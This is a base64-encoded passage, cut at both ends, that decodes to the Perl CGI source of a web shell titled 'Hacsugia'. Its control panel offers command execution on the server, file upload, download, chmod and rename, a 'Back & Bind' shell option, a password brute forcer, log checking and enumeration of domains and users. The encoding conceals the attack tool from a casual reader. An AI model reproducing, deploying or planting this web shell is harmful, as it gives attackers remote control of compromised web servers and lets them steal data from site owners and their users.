eCwgeW91CgkJCQkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLgoKJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gV2luZG93cyBOVC4KCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gVW5peC4KCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkCgkJCQkJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMKCQkJCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLgoJCQkJCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMKCQkJCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQoJCQkJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlCgkJCQkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQKCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwokY29scz0gMTUwOwokcm93cz0gMjY7CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0CiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9LgojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kKIyBzY3JpcHRzLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcgojIEFyZ3VtZW50IDE6IEZvcm0gaXRlbSBuYW1lIHRvIHdoaWNoIGZvY3VzIHNob3VsZCBiZSBzZXQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCW15ICRkaXIgPSRDdXJyZW50RGlyOwoJJGRpcj1+IHMvXFwvXFxcXC9nOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+Cjx0aXRsZT5IYWNzdWdpYTwvdGl0bGU+CgokSHRtbE1ldGFIZWFkZXIKCjwvaGVhZD4KPHN0eWxlPgpib2R5ewpmb250OiAxMHB0IFZlcmRhbmE7Cn0KdHIgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICNmZjk5MDA7Cn0KdGQgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICMyQkE4RUM7CmZvbnQ6IDEwcHQgVmVyZGFuYTsKfQoKdGFibGUgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKQkFDS0dST1VORC1DT0xPUjogIzExMTsKfQoKCmlucHV0IHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOwpmb250OiAxMHB0IFZlcmRhbmE7CmNvbG9yOiAjZmY5OTAwOwp9CgppbnB1dC5zdWJtaXQgewp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47CmNvbG9yOiAjRkZGRkZGOwpib3JkZXItY29sb3I6ICMwMDk5MDA7Cn0KCmNvZGUgewpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsKQkFDS0dST1VORC1DT0xPUjogQmxhY2s7CmZvbnQ6IDEwcHQgVmVyZGFuYSBib2xkOwpjb2xvcjogd2hpbGU7Cn0KCnJ1biB7CmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOwpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsKY29sb3I6ICNGRjAwQUE7Cn0KCnRleHRhcmVhIHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7CmZvbnQ6IEZpeGVkc3lzIGJvbGQ7CmNvbG9yOiAjYWFhOwp9CkE6bGluayB7CglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lCn0KQTp2aXNpdGVkIHsKCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmhvdmVyIHsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjZmY5OTAwOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmFjdGl2ZSB7Cgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUKfQoKLmxpc3RkaXIgdHI6aG92ZXJ7CgliYWNrZ3JvdW5kOiAjNDQ0Owp9Ci5saXN0ZGlyIHRyOmhvdmVyIHRkewoJYmFja2dyb3VuZDogIzQ0NDsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmU7Cn0KLm5vdGxpbmV7CgliYWNrZ3JvdW5kOiAjMTExOwp9Ci5saW5lewoJYmFja2dyb3VuZDogIzIyMjsKfQo8L3N0eWxlPgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gY2htb2RfZm9ybShpLGZpbGUpCnsKCS8qdmFyIGFqYXg9J2FqYXhfUG9zdERhdGEoIkZvcm1QZXJtc18nK2krJyIsIiRTY3JpcHRMb2NhdGlvbiIsIlJlc3BvbnNlRGF0YSIpOyByZXR1cm4gZmFsc2U7JzsqLwoJdmFyIGFqYXg9IiI7Cglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpCnsKCXJlc3BvbnNlLmlubmVySFRNTCA9ICI8c3BhbiBvbmNsaWNrPVxcXCJjaG1vZF9mb3JtKCIgKyBpICsgIiwnIisgZmlsZSsgIicpXFxcIiA+IisgcGVybXMgKyI8L3NwYW4+PC90ZD4iOwp9CmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQp7Cgl2YXIgYWpheD0iIjsKCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOwoJdmFyIGJhY2s9InJtX3JlbmFtZV9mb3JtKCIraSsiLFxcXCIiK2ZpbGUrIlxcXCIsXFxcIiIrZisiXFxcIik7IHJldHVybiBmYWxzZTsiOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpCnsKCWlmKGY9PSdmJykKCXsKCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Y29tbWFuZCZkPSRkaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsKCX1lbHNlCgl7CgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOwoJfQp9Cjwvc2NyaXB0Pgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBjMGMwYyIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGNlbnRlcj48Y29kZT4KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+Cjx0cj4KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+CgkJPGI+PGZvbnQgc2l6ZT0iNSI+JEVkaXRQZXJzaW9uPC9mb250PjwvYj4KCTwvdGQ+CgoJPHRkPgoKCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4KCTwvdGQ+Cgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjY2MwMDAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iIzAwMDAwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4KCTwvdGQ+Cgo8L3RyPgoKPHRyPgo8dGQgY29sc3Bhbj0iMyI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVkQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1ndWkmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkdVSTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNoZWNrbG9nIj5DaGVjayBMb2c8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwKPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9IiMiPkhlbHA8L2E+Cgo8L2ZvbnQ+PC90ZD4KPC90cj4KPC90YWJsZT4KPGZvbnQgaWQ9IlJlc3BvbnNlRGF0YSIgY29sb3I9IiNmZjk5Y2MiID4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCglwcmludCA8PEVORDsKPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4KICAgIHJldHVybjsKICB9CiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsKICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsKICB0aGlzLmludGVydmFsID0gKHR5cGVvZiBpbnRlcnZhbCA9PSAidW5kZWZpbmVkIiA/IDEwMCA6IGludGVydmFsKTsKICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsKICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0OwogIHRoaXMuY3Vyc29yID0gKGN1cnNvciA/IGN1cnNvciA6ICIiKTsKICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7CiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgdGhpcy5lbGVtZW50LnR5cGluZ1RleHQgPSB0aGlzOwogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsKICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOwogIHRoaXMucnVubmluZyA9IGZhbHNlOwogIHRoaXMuaW5UYWcgPSBmYWxzZTsKICB0aGlzLnRhZ0J1ZmZlciA9ICIiOwogIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7Cn0KVHlwaW5nVGV4dC5hbGwgPSBuZXcgQXJyYXkoKTsKVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOwpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgewogIGZvcih2YXIgaSA9IDA7IGkgPCBUeXBpbmdUZXh0LmFsbC5sZW5ndGg7IGkrKykgVHlwaW5nVGV4dC5hbGxbaV0ucnVuKCk7Cn0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7CiAgaWYodGhpcy5ydW5uaW5nKSByZXR1cm47CiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuCiAgICByZXR1cm47CiAgfQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsKLy8gIHRoaXMub3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0LnJlcGxhY2UoLzwoW148XSkqPi8sICIiKTsgICAgIC8vIFN0cmlwIEhUTUwgZnJvbSB0ZXh0LgogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgewogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7CiAgICAgIHRoaXMudGFnQnVmZmVyID0gIjwiOwogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gIj4iOwogICAgICB0aGlzLmluVGFnID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiYiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gIjsiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOwogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSB7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICB9CiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsKICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgKz0gKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCAtIDEgPyAodHlwZW9mIHRoaXMuY3Vyc29yID09ICJmdW5jdGlvbiIgPyB0aGlzLmN1cnNvcih0aGlzLmN1cnJlbnRUZXh0KSA6IHRoaXMuY3Vyc29yKSA6ICIiKTsKICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgIHNldFRpbWVvdXQoImRvY3